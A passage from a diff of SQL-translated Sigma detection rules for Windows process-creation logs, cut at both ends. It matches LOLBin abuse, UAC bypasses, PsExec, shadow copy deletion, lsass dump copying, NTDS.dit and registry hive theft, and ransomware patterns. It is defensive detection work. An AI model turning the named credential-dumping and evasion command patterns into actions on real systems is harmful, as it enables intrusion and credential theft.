'%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "status": "experimental", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Bypass UAC via WSReset.exe", - "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1059", + "attack.t1202" ], "falsepositives": [ - "Unknown sub processes of Wsreset.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" }, { - "title": "Potential Procdump Evasion", - "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "WMI Backdoor Exchange Transport Agent", + "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "title": "Suspicious Process Created Via Wmic.EXE", + "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": 